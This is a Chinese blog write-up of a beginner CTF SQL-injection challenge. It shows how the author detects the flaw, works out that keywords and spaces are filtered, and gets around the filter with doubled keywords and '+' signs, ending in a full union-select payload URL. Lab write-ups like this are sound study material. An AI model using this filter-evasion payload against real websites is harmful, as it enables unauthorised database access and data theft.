實驗吧CTF 簡單的sql注入解題WriteUp

解題思路:研究了好久,看了這道CTF題目的writeup才知道

在文本框輸入1,提交,鏈接變成id=1

在文件框輸入1‘,提交,報錯,判斷存在注入。

初步預(yù)計后臺表為flag,字段名為flag,需要構(gòu)造union?select?flag?from?flag來執(zhí)行。

根據(jù)第二步的報錯信息看,多加個‘,后面的語句需要再構(gòu)造一個條件來結(jié)束’,注入語句為:1‘?union?select?flag?from?flag?where?'t'='t

執(zhí)行后報錯:heck?the?manual?that?corresponds?to?your?MySQL?server?version?for?the?right?syntax?to?use?near?'flag?flag?'t'='t''?at?line?1

分析:根據(jù)錯誤信息發(fā)現(xiàn)只有變量了,其他的關(guān)鍵字都被過濾了。

把關(guān)鍵字寫2遍提交,發(fā)現(xiàn)如下報錯:?corresponds?to?your?MySQL?server?version?for?the?right?syntax?to?use?near?'unionselectflag?fromflag?where't'='t''?at?line?1

分析:發(fā)現(xiàn)空格被過濾了

使用+號在空格之前連接:

http://ctf5.shiyanbar.com/423/web/?id=1?'+unionunion?+selectselect?+flag+fromfrom?+flag+wherewhere+'t'='t

得到KEY:flag{xxxxxx}

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 在學習sql注入的過程中,一開始只想著怎么手工注入,卻發(fā)現(xiàn)手工注入的道路,說麻煩不麻煩,但是說簡單也很不簡單,相...
    沙雕帶你蒿羊毛閱讀 9,242評論 0 0
  • 注入攻擊的分類 1.沒有正確過濾轉(zhuǎn)義字符 在用戶的輸入沒有為轉(zhuǎn)義字符過濾時,就會發(fā)生這種形式的注入式攻擊,它會被傳...
    查無此人asdasd閱讀 1,837評論 0 5
  • 姓名:于川皓 學號:16140210089 轉(zhuǎn)載自:https://baike.baidu.com/item/sq...
    道無涯_cc76閱讀 2,045評論 0 2
  • https://juejin.im/entry/59a4bbb56fb9a0247a60eb5c?utm_sour...
    凱旋閱讀 155評論 0 0
  • 誰說你心腸硬 還沉默寡言 那是沒遇到如水的姑娘以前 一旦邂逅 就淺吟低唱 柔腸綿綿
    蕙蘭漱雪閱讀 561評論 0 0

友情鏈接更多精彩內(nèi)容